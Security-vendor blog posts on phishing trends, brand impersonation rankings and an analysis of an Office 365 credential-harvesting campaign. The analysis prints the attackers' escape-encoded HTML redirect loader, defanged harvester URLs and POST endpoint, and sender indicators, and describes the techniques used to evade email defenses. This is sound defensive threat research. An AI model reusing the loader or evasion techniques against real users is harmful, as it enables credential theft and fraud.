After shutting down a ‘phishing-as-a-service’ operation that impacted thousands of victims in 43 countries, INTERPOL recently noted, “Cyberattacks such as phishing may be borderless and virtual in nature, but their impact on victims is real and devastating.” Business email compromise (BEC), a type of malware-less attack that tricks recipients into transferring funds — for example — has cost victims worldwide more than $50 billion, according to the FBI.

It is estimated that 90% of successful cyber attacks start with email phishing, which continues to be very lucrative for attackers. There is not much today that can be done to stop phishing attempts. However, to prevent successful attacks, it is important to understand (and proactively address) evolving phishing trends — including the ways attackers cleverly exploit intended victims’ trust in “known” email senders. To that end, this week Cloudflare published its first Phishing Threats Report.

This report explores key phishing trends and related recommendations, based on email security data from May 2022 to May 2023. During that time, Cloudflare processed approximately 13 billion emails, which included blocking approximately 250 million malicious messages from reaching customers’ inboxes. The report is also informed by a Cloudflare-commissioned survey of 316 security decision-makers across North America, EMEA, and APAC (you can download that separate study here).

Check out the full report to understand our three key takeaways:

• Attackers using deceptive links as the #1 phishing tactic — and how they are evolving how they get you to click and when they weaponize the link;

• Identity deception takes multiple forms (including business email compromise (BEC) and brand impersonation), and can easily bypass email authentication standards;

• Attackers pretend to be hundreds of different organizations, but they primarily impersonate the entities we trust and need to get work done.

Here are a few other things to keep in mind as you read the 2023 Phishing Threats report.

Attackers typically use a combination of social engineering and technical obfuscation techniques to make their messages seem legitimate. Therefore, Cloudflare uses a number of advanced detection techniques to analyze “fuzzy” signals (not just content that’s visible to the naked eye) to identify unwanted emails. Those signals include:

• Structural analysis of headers, body copy, images, links, attachments, payloads, and more, using heuristics and machine learning models specifically designed for phishing signals;

• Sentiment analysis to detect changes in patterns and behaviors (e.g., writing patterns and expressions);

• Trust graphs that evaluate partner social graphs, email sending history, and potential partner impersonations

Our email security service also incorporates threat intelligence from Cloudflare’s global network, which blocks an average of 140 billion cyber threats each day.

Those and many other signals lead to email dispositions of malicious, BEC, spoof, or spam; our dashboard tells customers the specific reasons (i.e., the threat indicator ‘categories’) for a particular email disposition.

Below is a snapshot of the top email threat indicators we observed between May 2, 2022, to May 2, 2023. We categorize threat indicators into more than 30 different categories; over that period, the top threat indicators included deceptive links, domain age (newly registered domains), identity deception, credential harvesting, and brand impersonation.

Below are brief descriptions of each of the top categories (detailed in more depth in the report’s appendix).

If clicked, a deceptive link will open the user’s default web browser and render the data referenced in the link, or open an application directly (e.g. a PDF). Since the display text for a link (i.e., hypertext) in HTML can be arbitrarily set, attackers can make a URL appear as if it links to a benign site when, in fact, it is actually malicious.

Domain age is related to domain reputation, which is the overall score assigned to a domain.  For example, domains that send out numerous new emails immediately after domain registration will tend to have a poorer reputation, and thus a lower score.

Identity deception occurs when an attacker or someone with malicious intent sends an email claiming to be someone else. The mechanisms and tactics of this vary widely. Some tactics include registering domains that look similar (aka domain impersonation), are spoofed, or use display name tricks to appear to be sourced from a trusted domain. Other variations include sending email using domain fronting and high-reputation web services platforms.

Credential harvesters are set up by an attacker to deceive users into providing their login credentials. Unwitting users may enter their credentials, ultimately providing attackers with access to their accounts.

Brand impersonation is a form of identity deception where an attacker sends a phishing message that impersonates a recognizable company or brand. Brand impersonation is conducted using a wide range of techniques.

An attachment to an email that, when opened or executed in the context of an attack, includes a call-to-action (e.g. lures target to click a link) or performs a series of actions set by an attacker.

Cloudflare regularly observes multiple threat indicators in one phishing email. For example, one Silicon Valley Bank-themed phishing campaign (detailed in this March 2023 blog) combined brand impersonation with a deceptive link and malicious attachment.

The attackers leveraged the SVB brand in a DocuSign-themed template. The email included HTML code that contains an initial link and a complex redirect chain that is four deep. The included HTML file in the attack would have sent the recipient to a WordPress instance that has recursive redirection capability.

(Speaking of links, deceptive links were the #1 threat category, appearing in 35.6% of our detections. And attackers aren’t just using links in email channels; the rise of multi-channel phishing threats — which exploit other applications such as SMS/text, chat, and social media — are also covered in the report).

Silicon Valley Bank was just one of approximately 1,000 different brands we observed being impersonated in emails targeting Cloudflare customers between May 2022 and May 2023. (Cloudflare employees were directly targeted via brand impersonation in the “Oktapus” phishing attack that the Cloudflare One suite of products thwarted in July 2022).

However, as detailed in the Phishing Threats Report, we observed that email attackers most often (51.7% of the time) impersonated one of 20 well-known global brands, with Microsoft being #1 on their list.

Earlier this year, Cloudflare detected and blocked a phishing campaign leveraging the Microsoft brand in an attempt to harvest credentials through a legitimate — but compromised — site.

In the email example below, there is no text in the body of the email despite its appearance. The entire body is a hyperlinked JPEG image. Thus, if the recipient clicks anywhere in the body (even if they don’t intend to click the link), they are effectively clicking the link.

Initially, the hyperlink for this image appears to be a benign Baidu URL - hxxp://www.baidu[.]com/link?url=-yee3T9X9U41UHUa3VV6lx1j5eX2EoI6XpZqfDgDcf-2NYQ8RVpOn5OYkDTuk8Wg#<recipient’s email address base64 encoded>.  However, if this link is clicked, the target’s browser would be redirected to a site that had been compromised and used to host a credential harvester.

The attacker used Microsoft Office 365 branding, but attempted to circumvent any brand detection techniques by including the brand information within the image (i.e., there was no plaintext or HTML text that could be inspected to identify the brand).

However, using optical character recognition (OCR), Cloudflare successfully identified “Office 365” and “Microsoft” in the image. Using OCR, we also identified the use of suspicious account lures related to passwords.

In this example, attackers’ techniques included:

• Inclusion of only a JPEG image (impossible to detect words without OCR)

• Embedding a hyperlink in that image (clicking anywhere in the body would result in clicking the link)

• Hyperlinking to a Baidu URL (used to bypass reputation-based URL detection techniques)

• The Baidu URL redirecting the recipient’s browser to a credential harvesting site (i.e., would circumvent other email security defenses that are not capable of deep link inspection)

• Hosting the credential harvester on a legitimate site that had been compromised by the attacker (even with deep link inspection, will again attempt to bypass URL detection techniques based on reputation)

This attack vector leverages the high reputation and authenticity of Baidu to bypass the reputation of the true host/IP where the credential harvester is hosted.

While this specific campaign focused on harvesting Microsoft credentials, we often see attackers using similar methods to bypass brand detection techniques and trick victims into downloading malware and other malicious payloads.

URL redirection techniques are often seen in phishing campaigns, but threat actors are continuing to refine their approach by abusing more and more legitimate domains like baidu.com, bing.com, goo.gl, etc. Our numerous detection capabilities allow us to conduct deep link inspection of URLs using redirection techniques of all kinds, including those that abuse legitimate domains.

Email authentication (specifically the SPF, DKIM, and DMARC standards) are often mentioned as useful against brand impersonation: these standards help validate server and tenant origins, protect message integrity, provide policy enforcement, and more.

However, attackers can still find ways to bypass authentication to trick email suites; and we actually observed that 89% of unwanted messages “passed” SPF, DKIM, and/or DMARC checks.

Some limitations of email authentication include:

Attackers are constantly evolving their tactics. Multiple protection layers must be enacted before, during, and after messages reach the inbox. Cloudflare never inherently “trusts” any type of email communication (whether it appears to be internal, external, or from a ‘known’ business partner).

Likewise, we recommend that — first and foremost — all organizations extend the Zero Trust security model of “never trust, always verify” not just to the network and applications, but also to the email inbox.

In addition to securing email with a Zero Trust approach, we also recommend:

• Augmenting cloud email with multiple anti-phishing controls. As noted in this Forrester blog from June, “The use of messaging, collaboration, file sharing, and enterprise software-as-a-service applications across multiple devices all contribute to employee productivity and experience. Many of these environments are considered ‘closed,’ but one successful phish of a supply chain partner’s credentials opens your organization up to data loss, credential theft, fraud, and ransomware attacks. Protections developed for the email inbox must extend to these environments and throughout the day-to-day workflows of your employees.”

• Adopting phishing-resistant multifactor authentication (MFA). While not all MFA provides the same layer of security, hardware security keys are among the most secure authentication methods for preventing successful phishing attacks. They can protect networks even if attackers gain access to usernames and passwords.

• Make it harder for humans to make mistakes.  Meet employees and teams where they are by making the tools they already use more secure, and preventing them from making mistakes. For example, remote browser isolation (RBI) technology, when integrated with cloud email security, can automatically isolate suspicious email links to prevent users from being exposed to potentially malicious web content. Keyboard inputs can also be disabled on untrusted websites, protecting users from accidentally entering sensitive information within a form fill or credential harvesting. This provides a layer of defense against multi-channel phishing attacks by effectively allowing users to safely open links without disrupting their workflow.

If you’re interested in the full findings, you can download the 2023 Phishing Threats Report here, as well as our recommendations for preventing successful phishing attacks. And if you’d like to see Cloudflare’s email security in action, you can request a free phishing risk assessment here.

Dear America’s sports-loving, company-securing fans: Before you find yourself glued this weekend to (what some call) THE biggest game in college basketball history, we are here to crown the 2022 March Hackness winner!

Also known as: the organization most impersonated by attackers in phishing campaigns in 2021.

Despite the shiny crop of newcomers to the Top 64 impersonated organizations (which included Notion.so, Binance, and grocery stores from Costco to Kwik Shop), our March Hackness “Final Four” ended up mirroring the 2022’s NCAA Men’s Final Four: with the blue blood brands, that is.

That’s right, folks: on the heels of passing enduring the second year of the COVID-19 pandemic, the World Health Organization beat out Amazon, Microsoft and T-Mobile to become the back-to-back winner of Area 1’s “ophishal” March Hackness title!

From Jan. 2021 to Jan. 2022, a whopping 15% (over 8.5 million) of the 56 million brand phishing emails blocked by Area 1 impersonated the WHO.

This timeframe (not coincidentally) matches the WHO remaining top of mind for global businesses closely monitoring the rollout of new vaccines and booster shots, as well as the rise of the Delta and Omicron variants.

The pandemic also influenced brand phishing in other ways. The “blue blood” of online retail and the cloud — and our March Hackness runner-up — Amazon, was impersonated in over 3.2 million phishing emails blocked by Area 1.

The focus of Amazon scams vary. However, as Area 1’s principal threat researcher, Juliette Cash, explains, common ones include phishing emails claiming that accounts have been ‘placed on hold,’ payments have been declined or that Prime memberships have ‘expired.’

These types of attacks utilize Amazon branding to impersonate official emails and entice victims to click links to update their credit card information. Once the link is clicked, the user’s browser will upload malicious content and direct them to verify their identity and input their payment details.

While these messages can be sent at any time, we’ve found that they are commonly tied to events, such as Amazon Prime Day, that trigger individuals to take action in fear of missing out.

By the way, although Amazon vs. the WHO isn’t exactly the epic and storied rivalry of Duke vs. UNC, Amazon has been in our list of top 64 most impersonated brands ever since March Hackness’ inception … so, we’ll count this matchup as an important piece of cybersecurity history!

Now, we have no idea what it’s like pretending to be a Blue Devil or Tar Heel (or Jayhawk or Wildcat) for a basketball season, but we do know some things about bad actors’ impersonation tactics.

Identity deception using tactics like spoofing, domain impersonation and display name impersonation showcase the ease at which people can deceive the user through brand phishing to gain access to their goals.

In many cases, it’s as simple as a display name change. However, there are (of course) much more complex phishing techniques that will evade standard defenses.

For example, in this 2021 vaccine phishing campaign (which originally bypassed Microsoft Office 365’s native defenses before it was blocked by Area 1), attackers pretending to be the CDC:

• Used Display Name Spoofing to fake the visible FROM header

• Inserted an SMTP HELO command to spoof the Envelope From domain

• Chose to spoof a domain that did not have email authentication protocols configured and that no longer resolved to an IP address

• Compromised a legitimate host with a benign IP, and used it to launch their phishing attack

That’s what you call a playbook.

And speaking of Microsoft, it made our “Final Four” of most-phished brands for the fourth consecutive year.

Attackers not only frequently impersonate individual Microsoft tools, they also often use Microsoft’s own tools and branding to bypass legacy defenses and email authentication. (Just one example: this credential harvesting campaign specifically leveraged Microsoft SharePoint and Microsoft Planner).

The bottom line is this: Attackers know how to deliver brand phishing campaigns with techniques that evade native email defenses, email authentication and sender reputation tools (i.e., DMARC, SPF and DKIM).

But – they’re not particularly clever or unique about whom they impersonate. As you can see from our March Hackness findings, just 25 organizations were used in the majority (57%) of these phishing emails.

There are three main reasons brand phishing continues to reach many organizations’ inboxes, year after year:

• It’s easy for attackers to establish new phishing domains that exploit trusted infrastructure.

• It’s fast for attackers to set up DMARC, SPF and DKIM policies for new phishing domains to reach inboxes.

• People trust emails from known organizations, business partners and internal employee accounts – accounts that they won’t identify as compromised unless they have more [advanced email security](more advanced email security in place) in place.

You can learn more about what the common email authentication standards (SPF, DKIM and DMARC) can and cannot do when it comes to correctly verifying the origins of emails (and who they claim to be from), here.

But what does work better than email authentication for preventing these kinds of phishing attacks? Advanced detection techniques.

For example, Area 1’s preemptive technology uses massive-scale web crawling to reveal emergent campaign infrastructure. Our small pattern analytics also identify phishing attack infrastructure, patterns of attack formation and threats within datasets that help us spot cyber campaigns as they’re being built.

To see which brand phishing emails are landing in your organization’s inbox (whether it’s from one of the March Hackness ‘players,’ or one of the 800-plus other brands hackers spoof), request a free Phishing Risk Assessment here.

And, in the  meantime, we hope you all enjoy the last of 2022 March Madness. We know we at Area 1 will!

Area 1 Security’s Sixth Annual March Hackness: The Perfect Phishing Bracket is here!

Learn who made the list of the top brands that attackers use in phishing lures. This bracket is based on an analysis of more than 56 million phishing emails blocked by Area 1’s solution in the preceding 12 months since Feb 2022. Like with the real tournament, there are some surprising Cinderella-like newcomers, well-known MVPs, and 800-plus spoofed organizations in between — but overall, 77% of all phishing attacks exploited just the Top 64 brands in our bracket, below.

Well, it’s that time of the year when NCAA basketball fans find themselves bemoaning broken brackets** and pondering life’s biggest questions, such as:

• How did the Wildcat men and women both lose in the first rounds?

• Was Baylor’s exit scientific proof that all good things really must come to an end?

• DID ALL THAT JUST REALLY HAPPEN?!

• What if the referees didn’t [insert your adjectives of choice here]?

**A heartbroken RIP to my unsuccessful pick-to-win-it-all, Gonzaga. Goodbye, Bulldogs, we barely knew you.

Now, the Area 1 Security folks can only offer some unscientific opinions to the questions above. After all, our job is to prevent breaches, not prognosticate about bad perfectly fine officiating.

Which means that, unlike the “sometimes it’s just luck” nature of college basketball in March, we prefer to look at cold, hard data to answer threat trend questions.

And that brings us to — DRUM ROLL PLEASE — the introduction of our Sixth Annual March Hackness: The Perfect Phishing Bracket!

This is the time of year we conclusively answer: Which organizations do attackers impersonate most in phishing campaigns?

For 2022, our analysis is based on more than 56 million phishing emails that we intercepted from January 2021 – January 2022. And although attackers pretended to be over 800 different organizations, ultimately, just 64 organizations were the go-to lures in a whopping 77% of these brand phishing attempts:

Now, we’ll reveal soon who was MOST impersonated, but let’s break down our Top 64 (and other initial findings from the overall data), below.

As always, attackers continued to take advantage of the following two, basic concepts when it comes to brand phishing campaigns (which, PS: easily evade DMARC and other email authentication standards):

1) Which technologies do people use most?In Area 1’s first-ever March Hackness, we found hackers often exploited “traditional” banks and financial institutions, and loved to spoof the likes of AOL, Yahoo!, and Craigslist. But that was in 2016, when AOL’s AIM was still around (!!), before Facebook Marketplace launched as ‘the new’ Craigslist … and before something mysterious called Crypto.com rebranded the Staples Center.

Flash forward to today, and:

• In a sign of the times, and acknowledgement of how much ‘the Cloud’ is a part of all of our lives**, more than 22%** of brand phishing attacks exploited commonly cloud services, such as Amazon, Box, DocuSign, Google, Intuit, Microsoft and many others.

• But, it isn’t just well-entrenched cloud companies on the list: viral-because-of-TikTok Notion.so, the productivity tool that’s won over high schoolers and The Wall Street Journal, appeared for the first time in our Top 64!

• Hackers are seeing dollar signs in cryptocurrency: Binance is a March Hackness newcomer (perhaps the Saint Peter’s of surprising suspect emails??!) this year. And although they didn’t crack the Top 64, Coinbase, Metamask, Kraken, Gemini and multiple crypto exchanges were also spoofed in thousands of phishing emails.

• By the way, Bitcoin, which doesn’t technically qualify as an organization for our bracket, still deserves its own special shot-out: hackers referenced Bitcoin in over 600,000 phishing emails last year. Actually, let’s just assume now that the crypto phishing trend has only one direction to go.

2) Which brands do people trust?Attackers know users are more inclined to open and click messages from organizations that they interact with, whether it’s for information, work or play.

In addition to leveraging the hybrid/remote workforce trend to phish users using popular cloud services, attackers also pretended to be:

• Healthcare & Social Services: With the Covid pandemic lingering on yet another year, the World Health Organization (last year’s “ophishal champion”) and Humana both reappear in the top 64. Area 1 also blocked thousands of phishing emails pretending to be from organizations like UNICEF and the Centers for Medicare & Medicaid Services … proving that hackers are more than willing to exploit society’s most vulnerable.

• Grocery Stores/Food & Beverage Retailers: Like 70% of U.S. households last year, my family did a LOT of online grocery shopping. In fact, over half of all shoppers (51%) started online grocery shopping after the pandemic began — and our data shows bad actors have also been happy to jump onto this bandwagon shopping cart. Area 1 intercepted millions of phishing emails spoofing grocers of all sizes, across all regions: from Fred Meyer to Amazon Fresh, to Kwik Shop to Costco, and many, many more.  [Insert bad pun about ordering ‘fish’, not ‘phish,’ here].

We’ll reveal the March Hackness champion — the No. 1 brand used for phishing (the organization used in a whopping 15% of the overall attacks) — soon!

And, in the meantime, you might be wondering: “Why should I care? My organization has email authentication and other tools to block emails from fake senders!”

Well (unless you’re using Area 1), chances are good that brand phishing is still fouling up your organization’s inboxes.

Email authentication standards (i.e., SPF, DKIM and DMARC) can serve useful security functions such as validating server and tenant origins, protecting message integrity, and providing policy enforcement.

However, email authentication is largely ineffective against brand phishing (especially when in the form of payload-less Business Email Compromise).

We’ll dive deeper into the reasons why, after we unveil the winner of the 2022 March Hackness: The Phishing Tournament. Stay tuned here.

PS: We can’t promise our findings will be less stressful than the NCAA championship game on April 4th. But, they should be more useful than wondering what “GO VOLS! GBO!” is like in real life.

• A large Microsoft 365 spoofing campaign evades Office 365’s native defenses and other email security defenses to target financial departments, C-suite executives and executive assistants across the financial services, insurance and retail industries.

• Attackers even specifically targeted newly-selected CEOs during critical transitionary periods.

• The credential harvesting campaigns utilized a variety of sophisticated techniques, including spoofing various Microsoft 365 service updates; using Microsoft-themed sender domains (to bypass email authentication); including PDF/HTM/HTML attachments; and leveraging advanced phishing kits.

• Although Area 1 blocked these campaigns, had the campaigns been successful, the attackers could have, for example, gained access to sensitive data of third parties to send fraudulent invoices and launch additional Business Email Compromise attacks.

Area 1 Security recently stopped a sophisticated Microsoft Office 365 credential harvesting campaign targeting C-suite executives, high-level assistants, and financial departments across numerous industries, including financial services, insurance, and retail. Further research and analysis of the activity revealed a much larger operation than originally discovered. This included several additional directly-related credential phishing campaigns that targeted the same industries and positions using sophisticated techniques and advanced phishing kits, to bypass Microsoft’s native email defenses and email authentication.

The campaigns, which began in early December and continued through February, targeted only select individuals at each company. Unlike the “spray and pray” method often seen with these types of cybercriminal-driven credential harvesting campaigns, this limited activity suggests a more targeted approach.

A large majority of the phishing attacks stopped by Area 1 Security were headed to financial controllers and treasurers at various international companies. By targeting the financial departments of these companies, the attackers could potentially gain access to sensitive data of third parties through invoices and billing, commonly referred to as a BEC (Business Email Compromise) attack. This enables the attackers to send forged invoices from legitimate email addresses to suppliers, resulting in payments being made to attacker-owned accounts.

Beyond financial departments, the attackers also targeted C-suite and executive assistants. Targeting high-level assistants is an often overlooked method of initial entry, despite these employees having access to highly sensitive information and an overall greater level of privileges.

In a few instances, the attackers even attempted to bait newly-selected CEOs of two major companies before any public announcements of this significant senior executive changeover were made.

By sending phishing messages during this critical transitionary period, the attackers likely hoped to catch the new CEOs off guard while they were focused with managing the new challenges that come with running a business.

What makes these phishing campaigns most noteworthy were the sophisticated methods employed by the threat actors at every step of the attack.

Clever tactics were used to not only craft the phishing messages, but also to send those messages, as well as to obtain passwords. These methods utilized a number of techniques at every step — including legitimate-looking domains and login pages, plus advanced phishing kits — to bypass email authentication and Microsoft’s email defenses.

It’s clear that the masterminds behind these attacks possess above-average skills compared to your typical credential harvesting schemers.

The first credential harvesting campaign, which initially bypassed Microsoft’s defenses and other email security layers before being discovered by Area 1 Security, involved emails containing purported instructions for applying an Office 365 security update, as detailed in Figure 1.

Figure 1. Phishing Message with Office 365 Brand Spoof

A bulk of the phishing messages had the Subject, “Important Service Changes”, and contained a number of sender display names that ranged from generic “no-reply” addresses to company-specific names.

However, other Subject lines, as observed in the additional related campaigns, included “PDF New Policy”, “PDF Service” and “Voice Message Received from Unidentified CallerID”. These related campaigns tailored the messages by also including the targeted company’s name in the Subject line.

To add legitimacy to the messages, an overwhelming majority of the observed phishing emails were sent from addresses with Microsoft-themed sender domains, such as microsoftoutlookwebservices[.]online and outlookonlinewebservices-com[.]online. The attackers also properly configured the SPF records for these domains to better ensure their messages passed email authentication.

In an effort to further avoid detection, the threat actors leveraged their Microsoft-imposter domains in the phishing attacks not long after they were registered.

This quick domain registration turnaround is a common tactic employed by scammers hoping to bait as many victims as possible before their newly registered domains are identified as phishing infrastructure.

In some cases, the attackers even compromised benign email accounts and used them to send the phishing messages in an attempt to stifle attribution to known actor-controlled phishing infrastructure. They also spoofed email addresses of poorly-configured legitimate sender domains, exploiting inherent weaknesses in email authentication protocols to allow them to easily evade phishing protection solutions.

Using Microsoft-themed update lures, the attackers appeared to take advantage of the general lack of security awareness that plagues most companies. Microsoft does not proactively send security alerts and updates of this nature via email to end-users, which should be the first sign of foul play. At most, a monthly security notification is sent to network administrators detailing recent Common Vulnerabilities and Exploits (CVEs).

However, because knowledge of an enterprise’s security update process is mostly unknown beyond the IT department, a significant number of employees could easily fall for this phish.

Ironically, fraudsters are constantly profiting off of angst surrounding ongoing cybersecurity scares, like the now-infamous SolarWinds breach, and they know that targets are likely to click out of fear that their noncompliance could be the source of another breach.

The phishing messages contained just enough details to lure unsuspecting targets into opening the attachment, which was either a PDF, HTML, or HTM file. Depicted in Figure 2 is an example of the PDF attachment, which contains redacted target information, including full name, email address, and company logo.

Figure 2. Example PDF Attachment with Link to Office 365 Credential Harvester

A majority of the targeted email accounts followed the format @, making the inclusion of full names in the attachments fairly effortless from an automated standpoint. However, even in cases where only initials appeared in the email address, the attackers still managed to include the target’s full name in the PDF attachment. This indicates that the threat actors conducted additional reconnaissance to carefully craft their phishing lures.

To fulfill the attacker’s request and “install” the feigned security update, the target would need to click on the “Apply Update” button, where they would be taken to one of several spoofed Office 365 login pages. This additional step for loading the credential harvesting site was only required if the target received a PDF attachment.

For both the HTML and HTM attachments, the credential harvesting site would automatically load in the victim’s browser once the file was opened. As shown in Figure 3, the attackers tried to avoid detection by using the JavaScript escape function to encode the HTML that loads the malicious web page.

<!DOCTYPE html>
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml">
<head>
<script language="javascript">document.write(unescape('%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%72%65%66%72%65%73%68%22%20%63%6F%6E%74%65%6E%74%3D%22%31%3B%68%74%74%70%73%3A%2F%2F%6C%6F%67%69%6E%2E%6D%69%63%72%6F%73%6F%66%74%6F%66%66%69%63%65%6F%6E%6C%69%6E%65%73%65%72%76%69%63%65%73%2E%63%6F%6D%3F%65%3D'));</script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<title>Outlook</title>

Once the code is unescaped, as detailed in Figure 4, you can see how the attackers used HTML “meta” refresh to direct the victim’s browser to load the credential harvesting site.

<meta http-equiv="refresh" content="1;hxxps://login.microsoftofficeonlineservices[.]com?e=<base64 encoded target email">

This functionality is one small part of a fairly advanced phishing kit that enabled the attackers to, at least initially, sneak past Microsoft’s Office 365 native defenses, and several other email security solutions, before being identified and stopped by Area 1 Security.

Once the target opens the HTML or HTM attachment, or clicks the “Apply Update” button, their browser will follow a series of HTTP redirects and client-side redirects via JavaScript or Meta fields. For example, one of the many links in the phishing messages that Area 1 Security observed included:

hxxps://simpus3.bandungkab.go[.]id/?username=<_base64 encoded target email address_>

If clicked, the target’s browser would then redirect to the URL:

hxxps://microsoftofficeonlineservices[.]outlookprivacypolicy[.]online/common/?client_id=4345a7b9-9a63-4910-a426-35363201d503&response_mode=form_post&response_type=code+id_token&scope=openid+profile&state=OpenIdConnect.AuthenticationProperties%3dKZeFMEdbUJBGtfhET_m7HpFINC_qWyaoYc_JS_C5znhJs0YOuquvhkEmzMzK3Ntri00CKVrHEJkyja-3DIXEvtgEaRE5mZ-jAKkVOhjSG4ud7eS1OSBeHlkBsB4tQsqP&nonce=637037128007965152.ODZmZWY4MGMtYzYwNC00M2NjLThmZWEtYmE4OTJiNmI1MWE2OWQwYWVkZWQtMjE2My00ZDcyLWEwN2UtN2M3ODA3OGZiNWY3&redirect_uri=https%3a%2f%2fwww[.]office[.]com%2f&ui_locales=en-US&mkt=en-US&client-request-id=c36fe010-0bb6-4e01-94f8-a8683b752a6d

As shown in Figure 5, this URL links to the landing page for the credential harvester, which displays a very convincing Microsoft-themed “privacy policy” statement.

Figure 5. Fake Microsoft Privacy Policy Statement

In the upper-right corner of the page is a uniquely photoshopped image of the Microsoft logo. Area 1 Security researchers overlaid this image on a black background, as depicted below, to highlight where the attackers edited the original logo.

Figure 6. Photoshopped Microsoft Logo

If the target clicks the “Accept” button on the privacy policy statement, they are further redirected to a fake Office 365 login page:

hxxps://microsoftofficeonlineservices[.]outlookprivacypolicy[.]online/common/oauth2-authorize/#client_id=4345a7b9-9a63-4910-a426-35363201d503&response_mode=form_post&response_type=code+id_token&scope=openid+profile&state=OpenIdConnect.AuthenticationProperties%3dKZeFMEdbUJBGtfhET_m7HpFINC_qWyaoYc_JS_C5znhJs0YOuquvhkEmzMzK3Ntri00CKVrHEJkyja-3DIXEvtgEaRE5mZ-jAKkVOhjSG4ud7eS1OSBeHlkBsB4tQsqP&nonce=637037128007965152.ODZmZWY4MGMtYzYwNC00M2NjLThmZWEtYmE4OTJiNmI1MWE2OWQwYWVkZWQtMjE2My00ZDcyLWEwN2UtN2M3ODA3OGZiNWY3&redirect_uri=https%3a%2f%2fwww[.]office[.]com%2f&ui_locales=en-US&mkt=en-US&client-request-id=c36fe010-0bb6-4e01-94f8-a8683b752a6d 

The page looks identical to the legitimate login, and to appear all the more convincing, the logo associated with the domain of the targeted company is dynamically loaded. More specifically, the domain appearing in the target’s email address is used to grab the company logo from the site logo.clearbit.com (i.e., http://logo.clearbit.com/). For demonstration purposes, the fake email “admin@google[.]com” was used to illustrate how the phishing kit displays the Google logo based on the “google.com” domain found in the “victim” email address.

Figure 7. Fake Office 365 Login

In some cases, the attackers were even more stealthy by prefetching the localized Office 365 sign-in:

• If the victim entered their email address, the attacker would verify it was a valid Office 365 address.

• In instances where the entered email address used Conditional Access, a different single sign-on (SSO), Active Directory Federation Services (ADFS), etc., the phishing kit would essentially break, and the victim would simply be redirected to the legitimate sign-in experience.

If the victim entered their password, it would be sent to the attacker as form data via an HTTP POST request to:

hxxps://microsoftofficeonlineservices[.]outlookprivacypolicy[.]online/common/oauth2-authorize/index[.]php

At this point, the attacker could gain full access to the victim’s email account, and possibly other systems or services if the victim reused their password.

A closer look at the source code for the credential harvesting sites revealed that the threat actors used free-use licenses for front-end web development to assist in creating an advanced phishing kit to clone the Microsoft login page.

For some observed campaigns, the phishing kit created different subdomains based on the email address hardcoded in the URL. Altering the email address would break the link and cause a redirect to either a spoofed Microsoft Service Agreement page, the Google homepage, or simply a blank page.

Unlike your typical run-of-the-mill credential harvesters where any email address can be entered as a URL parameter without affecting its functionality, this activity implies the threat actors were interested in a specific predetermined target list.

Another major difference in this phishing campaign compared to typical credential harvesters — and basic phishing kits for that matter — was the use of websockets to send screenshots back to the attackers on each click, in particular when a victim clicked the “Next” button after entering their email address and password.

Figure 8 highlights how JavaScript is used to execute the screenshot functionality and encode the resulting image in Base64.

Figure 8. Evidence of Phishing Kit Base64-Encoding Screenshots

It’s evident that the various campaigns observed by Area 1 Security leveraged an advanced phishing kit that used a variety of techniques as noted above, as well as a diverse set of phishing infrastructure.

At least nine different domains were used to host the credential harvesters. Four of these domains had Microsoft-themed names and appeared to be controlled by the attackers:

• microsoftofficeonlineservices[.]com

• outlookprivacypolicy[.]online

• office-policy-center[.]com

• ms365[.]us

Not surprisingly, the remaining domains were legitimate websites compromised by the attackers and co-opted for use in their phishing operations. There are a range of benefits for attackers in choosing benign sites to host malicious content, not the least of which includes the site’s positive reputation. It also reduces the attacker’s need to purchase infrastructure that could more easily be traced back to them.

Despite the fact that these credential harvesters spoofed a Microsoft login page, many of the sites remained active for a considerable time before being flagged as malicious and taken down. This game of “whack-a-mole” was hardly enough to deter these fraudsters. With each takedown, new phishing infrastructure quickly surfaced.

With threat actors well-equipped for stealing employee credentials, it is vital that companies prepare adequate defenses to protect users from falling victim to these login-themed attacks. As attackers continuously invent new ways to bypass defenses, including the use of advanced phishing kits, security practitioners need to turn to solutions on the cutting edge of email security technology in order to block these highly-damaging phishing campaigns.

New tactics and methods may be able to trick legacy vendors and cloud email providers such as Microsoft, but Area 1 Security’s cloud-native email security solution stops these attackers dead in their tracks. Our advanced Machine Learning and Artificial Intelligence technologies allow our algorithms to uncover new tactics used by malicious actors to bypass defenses in real-time (on average 24 days before industry benchmarks), versus waiting days or weeks for signature updates. Our time-zero detections lead the industry with reliable verdicts that stop phishing attempts at delivery time, so that users are never exposed to the attack.

Phishing Email Subject Lines:

Important Service Changes

PDF New Policy

PDF Service

Voice Message Received from Unidentified CallerID -

Sender Display Names:

TOS

Outlook

Notice

Policy

Voicemail

Voicemail Box

No Reply

No-reply

noreply

Sender Addresses:

audio-center@voicemail[.]microsoftoutlookwebservices[.]online

audio@voicebox[.]microsoftoutlookwebservices[.]online

mail-service@microsoftoutlookwebservices[.]online

mailman@microsoftoutlookwebservices[.]online

messages@voicebox[.]microsoftoutlookwebservices[.]online

no-reply@voicemailbox[.]microsoftoutlookwebservices[.]online

noreply@tos[.]microsoftoutlookwebservices[.]online

postfix@relay-server[.]microsoftoutlookwebservices[.]online

terms@tos[.]microsoftoutlookwebservices[.]online

voicemail@message-center[.]microsoftoutlookwebservices[.]online

voicemail@microsoftoutlookwebservices[.]online

no-reply@outlookonlinewebservices-com[.]online

noreply@outlookonlinewebservices-com[.]online

o365@outlookonlinewebservices-com[.]online

service@outlookonlinewebservices-com[.]online

msa@microsoft-message-center[.]outlookonlinewebservices-com[.]online

no-reply@microsoft-message-center[.]outlookonlinewebservices-com[.]online

noreply@microsoft-message-center[.]outlookonlinewebservices-com[.]online

o365@microsoft-message-center[.]outlookonlinewebservices-com[.]online

service@microsoft-message-center[.]outlookonlinewebservices-com[.]online

message-center@microsoftofficeonlinemessagecenter-com[.]ru

msa@microsoftofficeonlinemessagecenter-com[.]ru

no-reply@microsoftofficeonlinemessagecenter-com[.]ru

noreply@microsoftofficeonlinemessagecenter-com[.]ru

policy@microsoftofficeonlinemessagecenter-com[.]ru

o365@message-center[.]microsoftofficeonlinemessagecenter-com[.]ru

policy@message-center[.]microsoftofficeonlinemessagecenter-com[.]ru

no-reply@office[.]microsoftofficeonlinemessagecenter[.]com[.]ru

office@service[.]microsoftofficeonlinemessagecenter[.]com[.]ru

do-not-reply@delayed[.]entrepreserves[.]com

enitity@express[.]entrepreserves[.]com

nooze@ghosted[.]entrepreserves[.]com

no-reply@unnnetworked[.]sollutiance[.]com

